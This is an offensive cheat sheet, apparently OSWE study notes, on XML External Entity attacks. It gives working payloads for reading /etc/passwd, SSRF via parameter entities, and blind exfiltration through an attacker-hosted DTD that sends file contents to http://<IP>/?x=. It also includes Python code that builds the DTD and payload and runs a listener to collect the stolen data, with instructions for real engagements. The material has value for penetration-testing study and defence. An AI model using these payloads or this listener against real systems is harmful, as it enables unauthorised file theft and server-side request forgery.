OSWE Everything
XML External Entity (XXE)

Exploitation

Test whether the parser expands internal entities:

<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY variable "Replaced">
]>

[put &variable; between the tags of an element the application reflects
back; if "Replaced" shows up in the response, the parser expands entities]
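As an added example (not code from the original page), the internal-entity probe above assembled into a complete document and parsed with Python's xml.dom.minidom, which expands internal entities the way a vulnerable application parser would. The `data` element name and the `reflected_text` function, a stand-in for a server that echoes the element's text back, are assumptions standing in for whatever element the target reflects:

```python
import xml.dom.minidom

# Marker value from the page's probe; we look for it in the reflected output.
MARKER = "Replaced"


def internal_entity_probe(element: str = "data") -> str:
    """Build the page's internal-entity test wrapped around `element`.

    `element` is an assumption: use the element the target reflects.
    """
    return (
        f"<!DOCTYPE {element} [\n"
        f"<!ELEMENT {element} ANY >\n"
        f'<!ENTITY variable "{MARKER}">\n'
        "]>\n"
        f"<{element}>&variable;</{element}>"
    )


def reflected_text(xml_document: str, element: str = "data") -> str:
    """Assumed stand-in for the application: parse the request and echo
    the text of `element`. minidom (expat) expands internal entities, so
    &variable; comes back as its replacement text."""
    dom = xml.dom.minidom.parseString(xml_document)
    node = dom.getElementsByTagName(element)[0]
    return "".join(
        child.data for child in node.childNodes if child.nodeType == child.TEXT_NODE
    )


def parser_expands_entities(element: str = "data") -> bool:
    """True when the marker is reflected, i.e. the parser expanded the entity."""
    return MARKER in reflected_text(internal_entity_probe(element), element)


if __name__ == "__main__":
    print(internal_entity_probe())
    print("entities expanded:", parser_expands_entities())
```

Against a real target, send `internal_entity_probe()` as the request body and search the response for `Replaced`; a positive result here means the next payloads (file read, SSRF) are worth trying.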

XXE file read:

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>

[put &xxe; in an element of the request body that the application logic reflects in the response, so the file contents come back with it]

Interesting files:

XXE SSRF:

XXE can also be out-of-band (blind): the parser reaches the given URL, but the response contains no data confirming the connection, so the only evidence is the hit in your listener's log.

<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://<IP>/">]>

[put &xxe; in an element of the request body that the application logic reflects, or anywhere the parser will expand it]

You can also trigger the request from the DTD itself, with no reference in the document body, by declaring the entity as a parameter entity (note the %) and referencing it with %xxe; before the closing ]>. Parameter entities are expanded while the DTD is parsed, so this works even when nothing from the document is reflected.

XXE SSRF via Parameter Entity:

<!DOCTYPE ObjectNameFromDocument [
  <!ENTITY % xxe SYSTEM "http://<IP>/">
  %xxe;
]>

[you do not need to reference xxe anywhere in the body of the request]

XXE external DTD

Sample .dtd file hosted on an attacker's HTTP server (malicious.dtd in the payload below):

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://<IP>/?x=%file;'>">
%eval;
%exfiltrate;

The DTD does the following:

  1. Reads /etc/passwd into the file parameter entity.

  2. Defines the eval parameter entity, whose value is the declaration of a second parameter entity, exfiltrate. &#x25; is a character reference for %, so the inner declaration is not treated as a parameter entity reference while eval itself is being declared; %file; on the other hand is expanded right away, placing the file contents in the URL.

  3. Once declared, exfiltrate will be evaluated by sending an HTTP request to the attacker's server with the file contents.

  4. Referencing %eval; performs that nested declaration, which makes the exfiltrate entity usable.

  5. Referencing %exfiltrate; makes the parser request http://<IP>/?x=<file contents>, so the data arrives in the query string of the attacker's listener log.

Because the contents end up inside a URL, a file containing newlines or characters illegal in a URL (as /etc/passwd does) can make the parser reject the URI; start with a single-line file, or encode the contents with a wrapper (see Wrappers for errors).

Sample payload injected into the web application:

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://<IP>/malicious.dtd"> %xxe;]>
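Added example, not code from the original page: the attacker side of the external DTD technique in Python, a listener that serves the malicious DTD and records the value the victim's parser sends in ?x=, plus builders for the DTD and the injected payload. Because every request reaching the listener is logged, it also serves as the confirmation step for the blind SSRF payloads above. The attacker address, the malicious.dtd file name, and the `simulate_vulnerable_parser` function (a stand-in for the target's XML parser fetching the DTD and firing the exfiltration request with constructed file contents) are assumptions so that the example runs offline on localhost:

```python
import http.server
import threading
import urllib.parse
import urllib.request


def malicious_dtd(attacker: str, target_file: str = "/etc/passwd") -> str:
    """The page's external DTD, parameterised on listener address and file.

    %file; is expanded while %eval; is declared, so the file contents land in
    the exfiltrate URL; &#x25; keeps the inner '%' from being parsed too early.
    """
    return (
        f'<!ENTITY % file SYSTEM "file://{target_file}">\n'
        f"<!ENTITY % eval \"<!ENTITY &#x25; exfiltrate SYSTEM "
        f"'http://{attacker}/?x=%file;'>\">\n"
        "%eval;\n"
        "%exfiltrate;\n"
    )


def injected_payload(attacker: str, dtd_name: str = "malicious.dtd") -> str:
    """DOCTYPE injected into the application: fetch the DTD and evaluate it."""
    return f'<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://{attacker}/{dtd_name}"> %xxe;]>'


class ExfilListener:
    """HTTP listener: serves the DTD, logs every hit, records ?x= values."""

    def __init__(self, host: str = "127.0.0.1", port: int = 0):
        self.dtd = b""          # set after binding, since the DTD embeds our address
        self.hits = []          # every request path; a hit confirms blind SSRF
        self.received = []      # decoded ?x= values, i.e. the exfiltrated file
        listener = self

        class Handler(http.server.BaseHTTPRequestHandler):
            def do_GET(self):
                url = urllib.parse.urlparse(self.path)
                listener.hits.append(self.path)
                body = listener.dtd if url.path.endswith(".dtd") else b""
                if not body:
                    listener.received.extend(
                        urllib.parse.parse_qs(url.query).get("x", []))
                self.send_response(200)
                self.send_header("Content-Length", str(len(body)))
                self.end_headers()
                self.wfile.write(body)

            def log_message(self, *args):  # keep the demo quiet
                pass

        self.server = http.server.HTTPServer((host, port), Handler)
        bound_host, bound_port = self.server.server_address[:2]
        self.address = f"{bound_host}:{bound_port}"
        self.thread = threading.Thread(target=self.server.serve_forever, daemon=True)

    def start(self):
        self.thread.start()

    def stop(self):
        self.server.shutdown()
        self.server.server_close()


# Constructed single-line file contents. A real parser sends the raw bytes
# unencoded, which is why multi-line files such as /etc/passwd break the URL.
SAMPLE_FILE = "root:x:0:0:root:/root:/bin/bash"


def simulate_vulnerable_parser(attacker: str, file_contents: str = SAMPLE_FILE) -> str:
    """Assumed stand-in for the victim parser: fetch the DTD, then issue the
    request that %exfiltrate; would produce. Returns the DTD it was served."""
    with urllib.request.urlopen(f"http://{attacker}/malicious.dtd") as resp:
        dtd = resp.read().decode()
    with urllib.request.urlopen(
            f"http://{attacker}/?x=" + urllib.parse.quote(file_contents)):
        pass
    return dtd


def run_exfil_demo() -> list:
    """Start the listener, point the simulated victim at it, return what leaked."""
    listener = ExfilListener()
    listener.dtd = malicious_dtd(listener.address).encode()
    listener.start()
    try:
        simulate_vulnerable_parser(listener.address)
    finally:
        listener.stop()
    return listener.received


if __name__ == "__main__":
    print(injected_payload("<IP>"))
    print(run_exfil_demo())
```

In an engagement you would bind the listener to a routable address, serve `malicious_dtd(<your address>)`, inject `injected_payload(<your address>)` into the application, and read the file out of `received` (or the raw request log, if the parser sent bytes the query parser could not decode).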

